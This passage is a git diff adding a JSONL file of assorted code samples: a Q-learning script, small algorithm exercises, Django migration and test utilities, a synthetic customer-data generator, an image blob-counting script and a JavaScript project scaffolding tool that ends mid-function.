diff --git "a/409.jsonl" "b/409.jsonl"
new file mode 100644
--- /dev/null
+++ "b/409.jsonl"
@@ -0,0 +1,734 @@
+{"seq_id":"451749011","text":"import gym\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\ndef main(envName):\n\n def get_discrete_state(state):\n discrete_state = (state - env.observation_space.low) / discrete_os_win_size\n return tuple(discrete_state.astype(np.int))\n\n env = gym.make(envName)\n env.reset()\n\n learning_rate = 0.1\n discount = 0.95\n episodes = 25_000\n\n show_every = 500\n plot_every = 100\n\n discrete_os_size = [30] * len(env.observation_space.high)\n discrete_os_win_size = (env.observation_space.high - env.observation_space.low) / discrete_os_size\n\n epsilon = 0.25\n start_epsilon_decaying = 1\n end_epsilon_decaying = episodes // 2\n\n epsilon_decay_value = epsilon / (end_epsilon_decaying - start_epsilon_decaying)\n\n q_table = np.random.uniform(low=-2, high=0, size=(discrete_os_size + [env.action_space.n]))\n\n ep_rewards = []\n aggr_ep_rewards = {'ep': [], 'avg': [], 'min': [], 'max': []}\n\n for episode in range(episodes + 1):\n\n episode_reward = 0\n\n if (not episode % show_every):\n render = True\n else:\n render = False\n\n discrete_state = get_discrete_state(env.reset())\n\n done = False\n while not done:\n\n if (np.random.random() > epsilon):\n action = np.argmax(q_table[discrete_state])\n else:\n action = np.random.randint(0, env.action_space.n)\n\n observation, reward, done, info = env.step(action)\n episode_reward += reward\n new_discrete_state = get_discrete_state(observation)\n\n if (render):\n env.render()\n\n if not done:\n max_future_q = np.max(q_table[new_discrete_state])\n current_q = q_table[discrete_state + (action, )]\n\n new_q = (1 - learning_rate) * current_q + learning_rate * (reward + discount * max_future_q)\n q_table[discrete_state + (action, )] = new_q\n elif observation[0] >= env.goal_position:\n q_table[discrete_state + (action, )] = 0\n\n discrete_state = new_discrete_state\n\n if (end_epsilon_decaying >= episode >= start_epsilon_decaying):\n epsilon -= epsilon_decay_value\n\n ep_rewards.append(episode_reward)\n\n if not episode % plot_every:\n average_reward = sum(ep_rewards[-plot_every:]) / len(ep_rewards[-plot_every:])\n aggr_ep_rewards['ep'].append(episode)\n aggr_ep_rewards['avg'].append(average_reward)\n aggr_ep_rewards['min'].append(min(ep_rewards[-plot_every:]))\n aggr_ep_rewards['max'].append(max(ep_rewards[-plot_every:]))\n\n print(f\"Episode: {episode}, average: {average_reward}, min: {min(ep_rewards[-plot_every:])}, max: {max(ep_rewards[-plot_every:])}\")\n env.close()\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['avg'], label=\"avg\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['min'], label=\"min\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['max'], label=\"max\")\n plt.legend(loc=4)\n plt.grid()\n plt.show()\n","sub_path":"youtube_tutorial/basicQLearning.py","file_name":"basicQLearning.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"483312574","text":"def solution(prices):\n stack = [] #element : (price, index(day))\n n = len(prices)\n answer = [0] * n\n for curDay in range(n):\n curStockPrice = prices[curDay]\n\n while stack:\n preStockPrice, preDay = stack.pop()\n #현재 값이 더 크다면 넘겨!\n if curStockPrice >= preStockPrice:\n stack.append((preStockPrice,preDay))\n break\n answer[preDay] = curDay-preDay\n\n stack.append((curStockPrice,curDay))\n\n #마지막날 정산\n while stack:\n preStockPrice, preDay 
= stack.pop()\n answer[preDay] = curDay-preDay\n\n return answer\n\n\nprices = [1, 2, 3, 2, 3]\nprint(solution(prices))","sub_path":"Algorithm/[프로그래머스]주식가격.py","file_name":"[프로그래머스]주식가격.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612471953","text":"'''Using the method of looping, write a program to print the table of 9 till N in the format as follows:\n(N is input by the user)\n9 18 27...\nSample Input :\n3\nSample Output :\n9 18 27\n'''\nn= int(input())\nif n!=0:\n for i in range(1,n+1):\n if i!=n:\n print((i*9),end=\" \")\n else:\n print(i*9)\nelse:\n print(\"NULL\")\n","sub_path":"Python/Absolute Beginner/781.py","file_name":"781.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160189475","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('quizter', '0031_auto_20160521_1634'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='answer',\n name='test',\n field=models.ForeignKey(verbose_name='Тест', default=1, to='quizter.Test'),\n ),\n migrations.AlterField(\n model_name='useranswer',\n name='username',\n field=models.ForeignKey(verbose_name='Логин', default=1, to=settings.AUTH_USER_MODEL),\n ),\n ]\n","sub_path":"quizter/migrations/0032_auto_20160522_1210.py","file_name":"0032_auto_20160522_1210.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502414658","text":"#%%\n## GERANDO DATASET DE DADOS DOS CLIENTES:\n## - NOME + SEXO\n## - SOBRENOME\n## - DATA_NASCIMENTO\n## - CPF\n## - ENDEREÇO\n\n\n#%%\nimport pandas as pd \nimport numpy as np\nimport re \nimport requests\nfrom bs4 import BeautifulSoup\n\nnp.random.seed(42)\n# %%\n#### PARTE 1: NOMES E SEXO DOS CLIENTES: #####\n### UTILIZANDO O DATASET https://brasil.io/dataset/genero-nomes/files/ \n### DO brasil.io, DO ALVARO JUSTIN\n### OBRIGADO, ALVARO!\n\ndataset = pd.read_csv('csv/nomes.csv.gz')\ndataset = dataset[['group_name','classification']]\ndataset.rename(columns={'group_name':'nome','classification':'sexo'}, inplace = True)\ndataset\n# %%\n#### PARTE 2: SOBRENOMES\n### UTILIZANDO SOBRENOMES DE tiltedlogic.org\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nreq = requests.get('http://www.tiltedlogic.org/Familia/surnames-all.php?tree=', headers = headers)\nsoup = BeautifulSoup(req.text)\nlista_sobrenomes_simples = [x.text.encode('latin').decode('utf8').strip().upper() for x in soup.find_all('a', {'href':re.compile('mylastname')})][4:]\n\nfuncao_ordem_sobrenome_aleatoria = lambda: np.random.choice(lista_sobrenomes_simples, len(lista_sobrenomes_simples), replace = False)\n\ndef sobrenome_composto():\n result = set()\n for x in funcao_ordem_sobrenome_aleatoria():\n for y in funcao_ordem_sobrenome_aleatoria():\n if x != y:\n result.add(x + ' ' + y)\n if len(result) == len(dataset):\n return list(result)\n\ndataset.insert(1,'sobrenome', sobrenome_composto())\ndataset\n\n#%%\n### CPFS: CRIAR CPFS VÁLIDOS\n\nlista_cpfs = [str(x) for x in np.random.randint(300000000,399999999,len(dataset))]\n\nfor x in range(len(lista_cpfs)):\n lala = sum([(int(y)*z) for y,z in 
zip(lista_cpfs[x], range(10,1,-1))])*10%11\n lala = lala if int(lala) < 10 else '0'\n lista_cpfs[x] = lista_cpfs[x] + str(lala)\n lele = str(sum([(int(y)*z) for y,z in zip(lista_cpfs[x], range(11,1,-1))])*10%11)\n lele = lele if int(lele) < 10 else '0'\n lista_cpfs[x] = lista_cpfs[x] + lele\n\nlista_cpfs\n\n# %%\ndataset.insert(3, 'cpf', lista_cpfs)\n#%%\ndataset.insert(0, 'id_cliente', (dataset['nome'] + dataset['sobrenome'] + dataset['cpf']).apply(hash))\n\n#%%\ndataset\n\n\n# %%\ndataset.to_csv('csv/dados_clientes.csv', index = False)\n# %%\n","sub_path":"fake_datasets/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"157819647","text":"import matplotlib.pyplot as plt \nimport matplotlib.image as mpimg \nimport matplotlib.colors as clr\nimport numpy as np \nimport cv2 as cv\nimport os\nimport time\nimport screw_counting_library as sc\n\ndef main():\n folder = \"../../../dataset/images\"\n value_file = folder + \"/bases.txt\"\n \n imgs, files = sc.read_imgs(folder)\n values = sc.read_values(value_file)\n \n threshes = sc.morph_saturation(imgs)\n \n finals = []\n totals = []\n scores = []\n \n for (img, thresh, file, value) in zip(imgs, threshes, files, values):\n \n total, final = sc.blob_detection(img, thresh)\n score = sc.f1_measure(value, total)\n \n finals.append(final)\n totals.append(total)\n scores.append(score)\n \n save = zip(files, imgs, threshes, finals, values, totals, scores)\n rate = np.sum(scores) / len (scores)\n \n for (file, img, thresh, final, value, total, score) in save:\n print(\"Filename: %s, Detected objects: %d, Actual value: %d, Score: %5.3f\" % (file, total, value, score))\n \n print(\"\\n ######## \\n ######## \\n Average success in this batch: %5.3f \\n\" % (rate))\n\nif __name__ == '__main__':\n start = time.process_time()\n main()\n print(time.process_time() - start)\n\n\n\n","sub_path":"Code/Python_files/algorithm_test_2_blobDetection.py","file_name":"algorithm_test_2_blobDetection.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389289574","text":"import errno\nimport logging\nimport os\nimport shutil\nfrom contextlib import contextmanager\n\nfrom django.utils.six import StringIO\nfrom datetime import timedelta\n\nfrom django.core import serializers\nfrom django.db import IntegrityError\nfrom django.db import connections\nfrom django.apps import apps\nfrom django.core.management import call_command\n\nfrom django.conf import settings\nfrom django.contrib.auth import SESSION_KEY, HASH_SESSION_KEY, BACKEND_SESSION_KEY\nfrom django.contrib.auth.models import User\nfrom django.contrib.sessions.backends.db import SessionStore\nfrom django.contrib.sessions.models import Session\nfrom django.test import TestCase, TransactionTestCase, Client\nfrom django.utils.timezone import now\nfrom mock import patch\n\nfrom rest_framework.test import APIRequestFactory, force_authenticate\nfrom django_mock_queries.mocks import mocked_relations\n\nfrom constants import users\nfrom metadata.models import kive_user, KiveUser\n\n\nclass DuckRequest(object):\n \"\"\" A fake request used to test serializers. 
\"\"\"\n def __init__(self, user=None):\n self.user = user or kive_user()\n self.GET = {}\n self.META = {}\n self.method = 'GET'\n\n def build_absolute_uri(self, url):\n return url\n\n\nclass DuckContext(dict):\n \"\"\" A fake context used to test serializers. \"\"\"\n def __init__(self, user=None, **kwargs):\n super(DuckContext, self).__init__(**kwargs)\n self['request'] = DuckRequest(user=user)\n\n\nclass ViewMockTestCase(TestCase, object):\n def create_client(self):\n patcher = mocked_relations(User, Session)\n patcher.start()\n self.addCleanup(patcher.stop)\n\n user = User(pk=users.KIVE_USER_PK)\n User.objects.add(user)\n User.objects.model = User\n # noinspection PyUnresolvedReferences\n patcher = patch.object(User._meta, 'default_manager', User.objects)\n patcher.start()\n self.addCleanup(patcher.stop)\n dummy_session_key = 'dummysession'\n dummy_session = Session(\n session_key=dummy_session_key,\n expire_date=now() + timedelta(days=1),\n session_data=SessionStore().encode({\n SESSION_KEY: users.KIVE_USER_PK,\n HASH_SESSION_KEY: user.get_session_auth_hash(),\n BACKEND_SESSION_KEY: 'django.contrib.auth.backends.ModelBackend'}))\n Session.objects.add(dummy_session)\n client = Client()\n client.cookies[settings.SESSION_COOKIE_NAME] = dummy_session_key\n client.force_login(kive_user())\n return client\n\n\nclass BaseTestCases(object):\n \"\"\" A class to hide our base classes so they won't be executed as tests.\n \"\"\"\n def __init__(self):\n pass\n\n class ApiTestCase(TestCase, object):\n \"\"\"\n Base test case used for all API testing.\n\n Such test cases should provide tests of:\n - list\n - detail\n - creation (if applicable)\n - redaction\n - removal\n - any other detail or list routes\n\n In addition, inheriting classes must provide appropriate values for\n self.list_path and self.list_view in their setUp().\n \"\"\"\n def setUp(self):\n self.factory = APIRequestFactory()\n self.kive_user = kive_user()\n\n def mock_viewset(self, viewset_class):\n model = viewset_class.queryset.model\n patcher = mocked_relations(model, User, KiveUser)\n patcher.start()\n self.addCleanup(patcher.stop)\n\n user = User(pk=users.KIVE_USER_PK)\n User.objects.add(user)\n\n self.kive_kive_user = KiveUser(pk=users.KIVE_USER_PK, username=\"kive\")\n KiveUser.objects.add(self.kive_kive_user)\n\n # noinspection PyUnresolvedReferences\n patcher2 = patch.object(viewset_class,\n 'queryset',\n model.objects)\n patcher2.start()\n self.addCleanup(patcher2.stop)\n\n def test_auth(self):\n \"\"\"\n Test that the API URL is correctly defined and requires a logged-in user.\n \"\"\"\n # First try to access while not logged in.\n # noinspection PyUnresolvedReferences\n request = self.factory.get(self.list_path)\n # noinspection PyUnresolvedReferences\n response = self.list_view(request)\n self.assertEquals(response.data[\"detail\"], \"Authentication credentials were not provided.\")\n\n # Now log in and check that \"detail\" is not passed in the response.\n force_authenticate(request, user=self.kive_user)\n # noinspection PyUnresolvedReferences\n response = self.list_view(request)\n self.assertNotIn('detail', response.data)\n\n class SlurmExecutionTestCase(TransactionTestCase):\n \"\"\"\n Base test case used in lieu of TransactionTestCase for tests involving Slurm execution.\n\n This is a monkey-patched version of TransactionTestCase.\n \"\"\"\n serialized_rollback = True\n\n @staticmethod\n def deserialize_db_from_string(db_creation, data):\n \"\"\"\n Reloads the database with data from a string generated by\n the 
serialize_db_to_string method.\n \"\"\"\n from django.utils.six import StringIO\n\n data = StringIO(data)\n objects_to_add = list(serializers.deserialize(\"json\", data, using=db_creation.connection.alias))\n while len(objects_to_add) > 0:\n cannot_add_yet = []\n for obj in objects_to_add:\n try:\n obj.save()\n except IntegrityError:\n cannot_add_yet.append(obj)\n\n objects_to_add = cannot_add_yet\n\n def _fixture_setup(self):\n for db_name in self._databases_names(include_mirrors=False):\n # Reset sequences\n if self.reset_sequences:\n self._reset_sequences(db_name)\n\n # If we need to provide replica initial data from migrated apps,\n # then do so.\n if self.serialized_rollback and hasattr(connections[db_name], \"_test_serialized_contents\"):\n if self.available_apps is not None:\n apps.unset_available_apps()\n\n # Use our monkey-patched version of deserialize_db_from_string.\n BaseTestCases.SlurmExecutionTestCase.deserialize_db_from_string(\n connections[db_name].creation,\n connections[db_name]._test_serialized_contents\n )\n\n if self.available_apps is not None:\n apps.set_available_apps(self.available_apps)\n\n if self.fixtures:\n # We have to use this slightly awkward syntax due to the fact\n # that we're using *args and **kwargs together.\n call_command('loaddata', *self.fixtures,\n **{'verbosity': 0, 'database': db_name})\n\n def check_run_OK(self, run):\n for step in run.runsteps.all():\n for rsic in step.RSICs.all():\n self.assertTrue(rsic.is_successful())\n\n if step.has_subrun():\n self.check_run_OK(step.child_run)\n\n self.assertTrue(step.is_successful())\n\n for outcable in run.runoutputcables.all():\n self.assertTrue(outcable.is_successful())\n\n self.assertTrue(run.is_successful())\n\n\n# noinspection PyUnusedLocal\ndef dummy_file(content, name='dummy_file', mode='rb'):\n \"\"\" Create an in-memory, file-like object.\n\n :param str content: the contents of the file\n :param str name: a name for the file\n :param str mode: the mode to open the file (ignored)\n :return: an object that looks like an open file handle.\n \"\"\"\n\n data_file = StringIO(content)\n data_file.name = name\n data_file.__enter__ = lambda: None\n data_file.__exit__ = lambda extype, value, traceback: None\n return data_file\n\n\ndef check_media_root_is_test():\n if os.path.basename(settings.MEDIA_ROOT) != 'Testing':\n raise RuntimeError(\n \"MEDIA_ROOT doesn't end with 'Testing', use test settings.\")\n\n\ndef install_fixture_files(fixture_name):\n \"\"\"\n Helper that installs the FieldFiles for a given fixture.\n \"\"\"\n remove_fixture_files() # Remove any leftovers\n fixture_files_path = os.path.join(\"FixtureFiles\", fixture_name)\n assert os.path.isdir(fixture_files_path)\n\n for target in os.listdir(fixture_files_path):\n target_path = os.path.join(settings.MEDIA_ROOT, target)\n dir_to_install = os.path.join(fixture_files_path, target)\n shutil.copytree(dir_to_install, target_path)\n\n containers_path = os.path.join(settings.MEDIA_ROOT, 'Containers')\n if not os.path.exists(containers_path):\n os.makedirs(containers_path)\n test_container_path = os.path.join(containers_path,\n settings.DEFAULT_CONTAINER)\n if not os.path.exists(test_container_path):\n alpine_container_path = os.path.abspath(os.path.join(\n __file__,\n '..',\n '..',\n '..',\n 'samplecode',\n 'singularity',\n 'python2-alpine-trimmed.simg'))\n os.symlink(alpine_container_path, test_container_path)\n\n\ndef remove_fixture_files():\n \"\"\"\n Helper that removes all FieldFiles used by a test fixture.\n \"\"\"\n 
check_media_root_is_test()\n try:\n os.makedirs(settings.MEDIA_ROOT)\n # If that succeeded, then the folder is empty.\n return\n except OSError as ex:\n if ex.errno != errno.EEXIST:\n raise\n\n for dirname in os.listdir(settings.MEDIA_ROOT):\n target_path = os.path.join(settings.MEDIA_ROOT, dirname)\n shutil.rmtree(target_path)\n\n\ndef strip_removal_plan(plan):\n plan_not_blanks = {key: value\n for key, value in plan.items()\n if value}\n return plan_not_blanks\n\n\n@contextmanager\ndef capture_log_stream(log_level, *logger_names):\n mocked_stderr = StringIO()\n stream_handler = logging.StreamHandler(mocked_stderr)\n old_levels = {}\n loggers = {}\n for logger_name in logger_names:\n logger = logging.getLogger(logger_name)\n logger.addHandler(stream_handler)\n old_levels[logger_name] = logger.level\n logger.level = log_level\n try:\n yield mocked_stderr\n finally:\n for logger_name, logger in loggers.items():\n logger.removeHandler(stream_handler)\n logger.level = old_levels[logger_name]\n","sub_path":"kive/kive/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518206707","text":"\n\nfrom xai.brain.wordbase.nouns._subsidy import _SUBSIDY\n\n#calss header\nclass _SUBSIDIES(_SUBSIDY, ):\n\tdef __init__(self,): \n\t\t_SUBSIDY.__init__(self)\n\t\tself.name = \"SUBSIDIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"subsidy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_subsidies.py","file_name":"_subsidies.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"391982828","text":"import json\nimport os\nimport subprocess\nimport threading\nfrom distutils.dir_util import copy_tree\n\nfrom _browser import open_url\nfrom _code import append_code, patch_code, prepend_code, prepend_line\nfrom _editor import open_in_editor\nfrom _shutil import call_echo, cd, copy, mkdir, save_json, update_json\nfrom _template import render_template_file\nfrom _term import Menu\n\nOVERWRITE = bool(\"{{_OVERWRITE}}\")\n\nREACT_INDEX_JS = \"src/hello-react.jsx\"\nSERVER_INDEX_JS = \"src/server/index.js\"\nMODEL_DIR = \"src/server/models\"\nINDEX_JS = \"src/index.js\"\nTEMPLATE_DIR = os.getcwd() + \"/js_tools\"\nTHREEJS_INDEX_JS = \"src/hello-three.js\"\n\n\nmenu = Menu()\n\n\ndef write_file(file, content, overwrite=False):\n dir = os.path.dirname(file)\n if dir:\n os.makedirs(dir, exist_ok=True)\n if not os.path.exists(file) or overwrite:\n with open(file, \"w\") as f:\n f.write(content)\n\n\ndef add_packages(packages, dev=False, use_yarn=False):\n yarn_init()\n\n with open(\"package.json\", \"r\") as f:\n data = json.load(f)\n\n existing_packages = []\n\n try:\n existing_packages += data[\"dependencies\"].keys()\n except KeyError:\n pass\n\n try:\n existing_packages += data[\"devDependencies\"].keys()\n except KeyError:\n pass\n\n for pkg in packages:\n if pkg not in existing_packages:\n if dev:\n if use_yarn:\n call_echo([\"yarn\", \"add\", \"--dev\", pkg], shell=True)\n else:\n call_echo([\"npm\", \"install\", \"--save-dev\", pkg], shell=True)\n else:\n if use_yarn:\n call_echo([\"yarn\", \"add\", pkg], shell=True)\n else:\n call_echo([\"npm\", \"install\", pkg], shell=True)\n\n\n@menu.item()\ndef add_css_loader():\n add_packages([\"style-loader\", \"css-loader\"], dev=True)\n\n # Add babel-loader to webpack config\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n 
\"\"\"{\n test: /\\.css$/i,\n use: [\"style-loader\", \"css-loader\"],\n },\"\"\",\n )\n\n\n@menu.item()\ndef add_webpack(index_js=\"src/index.js\", build_dir=\"docs\"):\n WEBPACK_CONFIG = \"webpack.config.js\"\n\n add_packages(\n [\"webpack\", \"webpack-cli\", \"webpack-dev-server\", \"html-webpack-plugin\"],\n dev=True,\n )\n\n # CSS loader\n add_packages([\"style-loader\", \"css-loader\", \"file-loader\"], dev=True)\n\n if not os.path.exists(WEBPACK_CONFIG) or OVERWRITE:\n render_template_file(\n TEMPLATE_DIR + \"/webpack.config.js\",\n WEBPACK_CONFIG,\n context={\"index_js\": index_js, \"build_dir\": build_dir},\n )\n\n if not os.path.exists(index_js):\n os.makedirs(os.path.dirname(index_js), exist_ok=True)\n # pathlib.Path(index_js).touch()\n\n add_script_to_package(\n \"start\",\n \"webpack serve --mode development --devtool inline-source-map --hot\",\n )\n add_script_to_package(\"build\", \"webpack\")\n\n # webpack_start()\n\n\ndef webpack_start():\n os.environ[\"PATH\"] += os.pathsep + os.path.join(project_dir, \"node_modules\", \".bin\")\n threading.Thread(\n target=lambda: call_echo(\"webpack serve --mode development\")\n ).start()\n\n\ndef add_script_to_package(name, script):\n # Package.json\n with open(\"package.json\", \"r\") as f:\n data = json.load(f)\n\n if \"scripts\" not in data.keys():\n data[\"scripts\"] = {}\n\n data[\"scripts\"][name] = script\n\n with open(\"package.json\", \"w\") as f:\n json.dump(data, f, indent=2)\n\n\n@menu.item()\ndef add_react(index_js=REACT_INDEX_JS):\n add_webpack(index_js=index_js)\n\n # # https://create-react-app.dev/docs/getting-started/\n # call_echo(\"yarn create react-app client\")\n\n add_packages([\"react\", \"react-dom\"])\n\n # CSS loader\n add_packages([\"style-loader\", \"css-loader\"])\n\n # Babel: transcompile jsx\n add_packages(\n [\n \"babel-loader\",\n \"@babel/core\",\n \"@babel/preset-env\",\n \"@babel/preset-react\",\n \"babel-plugin-react-html-attrs\", # transform class → className\n ],\n dev=True,\n )\n\n with open(\".babelrc\", \"w\") as f:\n f.write(\n \"\"\"{\n \"presets\": [\"@babel/preset-env\", \"@babel/preset-react\"],\n \"plugins\": [\"react-html-attrs\"]\n}\n\"\"\"\n )\n\n # Add babel-loader to webpack config\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n \"\"\"{\n test: /\\.jsx?$/,\n exclude: /node_modules/,\n use: {\n loader: \"babel-loader\",\n },\n },\"\"\",\n )\n\n mkdir(os.path.dirname(index_js))\n if not os.path.exists(index_js) or OVERWRITE:\n render_template_file(TEMPLATE_DIR + \"/hello-react.jsx\", index_js)\n\n add_script_to_package(\n \"client\",\n \"webpack serve --mode development --devtool inline-source-map --hot\",\n )\n\n\n@menu.item()\ndef add_react_starter():\n # https://github.com/react-boilerplate/react-boilerplate-cra-template\n call_echo(\n [\"npx\", \"create-react-app\", \"--template\", \"cra-template-rb\", \"my-app\"],\n shell=True,\n )\n\n\n@menu.item()\ndef add_MERN_stack():\n add_react()\n add_express()\n add_mongodb()\n\n add_script_to_package(\"dev\", 'concurrently \"npm run server\" \"npm run client\"')\n\n # add \"dev\" to run server and client concurrently\n add_packages([\"concurrently\"], dev=True)\n call_echo(\"npm run dev\")\n\n\n@menu.item()\ndef add_dat_gui():\n add_packages([\"dat.gui\"])\n\n\n@menu.item()\ndef add_p5(index_js=\"src/index.js\"):\n add_packages([\"p5\"])\n add_packages([\"@types/matter-js\"], dev=True)\n\n s = \"\"\"import p5 from \"p5\";\n\nconst sketch = (p) => {\n let x = 100;\n let y = 100;\n\n p.setup = function () {\n p.createCanvas(700, 
410);\n };\n\n p.draw = function () {\n p.background(0);\n p.fill(255);\n p.rect(x, y, 50, 50);\n };\n};\n\nnew p5(sketch);\n\"\"\"\n\n if not os.path.exists(index_js) or OVERWRITE:\n mkdir(os.path.dirname(index_js))\n with open(index_js, \"w\") as f:\n f.write(index_js)\n\n\n@menu.item()\ndef add_react_bootstrap():\n add_packages([\"bootstrap\", \"react-bootstrap\", \"react-bootstrap-icons\"])\n\n # https://react-bootstrap.netlify.app/getting-started/introduction/\n prepend_line(REACT_INDEX_JS, \"import 'bootstrap/dist/css/bootstrap.min.css';\")\n\n\n@menu.item()\ndef add_express():\n add_packages([\"express\"])\n add_packages([\"nodemon\"], dev=True) # Monitor js changes and and hot reload\n\n # Package.json\n add_script_to_package(\"server\", \"nodemon src/server/index.js\")\n\n # Server index.js\n if not os.path.exists(SERVER_INDEX_JS) or OVERWRITE:\n mkdir(os.path.dirname(SERVER_INDEX_JS))\n with open(SERVER_INDEX_JS, \"w\") as f:\n f.write(\n \"\"\"const express = require('express');\nconst os = require('os');\n\nconst app = express();\n\napp.use(express.static('dist'));\n\napp.get(\"/api/getUsername\", (req, res) =>\n res.send({ username: os.userInfo().username })\n);\n\napp.listen(process.env.PORT || 8080, () => console.log(`Listening on port ${process.env.PORT || 8080}!`));\n\"\"\"\n )\n\n\n@menu.item()\ndef add_mongodb():\n add_packages([\"mongoose\"])\n\n mkdir(MODEL_DIR)\n with open(MODEL_DIR + \"/contact.js\", \"w\") as f:\n f.write(\n \"\"\"const mongoose = require(\"mongoose\");\n\nmodule.exports.Contact = mongoose.model(\n \"contact\",\n mongoose.Schema({\n name: {\n type: String,\n required: true,\n },\n phone: String,\n createDate: {\n type: Date,\n default: Date.now,\n },\n })\n);\n\"\"\"\n )\n\n patch_code(\n SERVER_INDEX_JS,\n \"^\",\n \"\"\"const mongoose = require(\"mongoose\");\nmongoose\n .connect(\"mongodb://localhost/test_db\", { useNewUrlParser: true })\n .then(() => {\n console.log(\"Database connected.\");\n })\n .catch((err) => console.log(err));\n\"\"\",\n count=1,\n )\n\n\n@menu.item()\ndef add_threejs():\n add_packages([\"three\", \"@types/three\"])\n\n os.makedirs(os.path.dirname(THREEJS_INDEX_JS), exist_ok=True)\n if not os.path.exists(THREEJS_INDEX_JS):\n render_template_file(TEMPLATE_DIR + \"/hello-three.js\", THREEJS_INDEX_JS)\n\n add_links()\n copy(TEMPLATE_DIR + \"/main.css\", \"src/main.css\", overwrite=False)\n write_file(\n \"src/index.js\",\n \"\"\"import \"./hello-three\";\nimport \"./links/links\";\nimport \"./main.css\";\"\"\",\n )\n\n\n@menu.item()\ndef add_tweakpane():\n # https://cocopon.github.io/tweakpane/getting-started/\n add_packages(\n [\n \"tweakpane\",\n \"@tweakpane/core\", # optional typescript support\n ]\n )\n\n\n@menu.item()\ndef add_typescript():\n add_packages([\"typescript\", \"ts-loader\"], dev=True)\n\n if not os.path.exists(\"tsconfig.json\"):\n save_json(\n \"tsconfig.json\",\n {\n \"compilerOptions\": {\n \"outDir\": \"./dist/\",\n \"noImplicitAny\": True,\n \"removeComments\": True,\n \"module\": \"es6\",\n \"target\": \"es5\",\n \"jsx\": \"react\",\n \"allowJs\": True,\n \"moduleResolution\": \"node\",\n }\n },\n )\n\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n \"\"\"{\n test: /\\.tsx?$/,\n use: 'ts-loader',\n exclude: /node_modules/,\n },\"\"\",\n )\n\n prepend_code(\n \"webpack.config.js\",\n \"output: {\",\n \"\"\"resolve: {\n extensions: ['.tsx', '.ts', '.js'],\n },\"\"\",\n )\n\n\n@menu.item()\ndef add_matterjs(index_js=\"src/index.js\"):\n add_packages([\"matter-js\"])\n 
add_packages([\"@types/matter-js\"])\n\n write_file(\n index_js,\n \"\"\"import * as Matter from \"matter-js\";\n\nvar Engine = Matter.Engine,\n Render = Matter.Render,\n Runner = Matter.Runner,\n Bodies = Matter.Bodies,\n Composite = Matter.Composite;\n\nvar engine = Engine.create();\n\nvar render = Render.create({\n element: document.body,\n engine: engine\n});\n\nvar boxA = Bodies.rectangle(400, 200, 80, 80);\nvar boxB = Bodies.rectangle(450, 50, 80, 80);\nvar ground = Bodies.rectangle(400, 610, 810, 60, { isStatic: true });\n\nComposite.add(engine.world, [boxA, boxB, ground]);\n\nRender.run(render);\n\n// create runner\nvar runner = Runner.create();\n\n// run the engine\nRunner.run(runner, engine);\n\"\"\",\n )\n\n\n@menu.item()\ndef open_vscode():\n open_in_editor(os.getcwd())\n\n\n@menu.item()\ndef add_fontawesome():\n add_packages(\n [\n \"@fortawesome/fontawesome-svg-core\",\n \"@fortawesome/free-brands-svg-icons\",\n ]\n )\n print(\n \"See also: https://fontawesome.com/v5.15/how-to-use/javascript-api/setup/library\"\n )\n\n\n@menu.item()\ndef add_face_landmark_detection():\n add_packages(\n [\n \"@tensorflow-models/face-landmarks-detection\",\n \"@tensorflow/tfjs-backend-webgl\",\n \"@tensorflow/tfjs-converter\",\n \"@tensorflow/tfjs-core\",\n ]\n )\n\n\n@menu.item()\ndef add_links():\n copy_tree(TEMPLATE_DIR + \"/links\", \"src/links\")\n\n\n@menu.item()\ndef nextjs_create_app():\n call_echo([\"yarn\", \"create\", \"next-app\", os.getcwd()], shell=True)\n\n\n@menu.item()\ndef nextjs_start_dev_server():\n open_url(\"http://localhost:3000/\")\n call_echo([\"yarn\", \"dev\"], shell=True)\n\n\n@menu.item()\ndef yarn_init():\n subprocess.check_call([\"run_script\", \"r/web/init_yarn_package.sh\"])\n\n\n@menu.item()\ndef add_puppeteer():\n add_packages([\"puppeteer\"])\n\n\n@menu.item()\ndef add_eslint():\n \"\"\"\n https://eslint.org/docs/latest/user-guide/getting-started\n \"\"\"\n update_json(\n \".vscode/settings.json\",\n {\n \"editor.formatOnSave\": True,\n \"editor.defaultFormatter\": \"esbenp.prettier-vscode\",\n \"editor.codeActionsOnSave\": {\"source.fixAll.eslint\": True},\n \"eslint.validate\": [\"javascript\"],\n },\n )\n add_packages(\n [\n \"@typescript-eslint/eslint-plugin\",\n \"@typescript-eslint/parser\",\n \"eslint\",\n \"eslint-config-airbnb\",\n \"eslint-config-airbnb-typescript\",\n 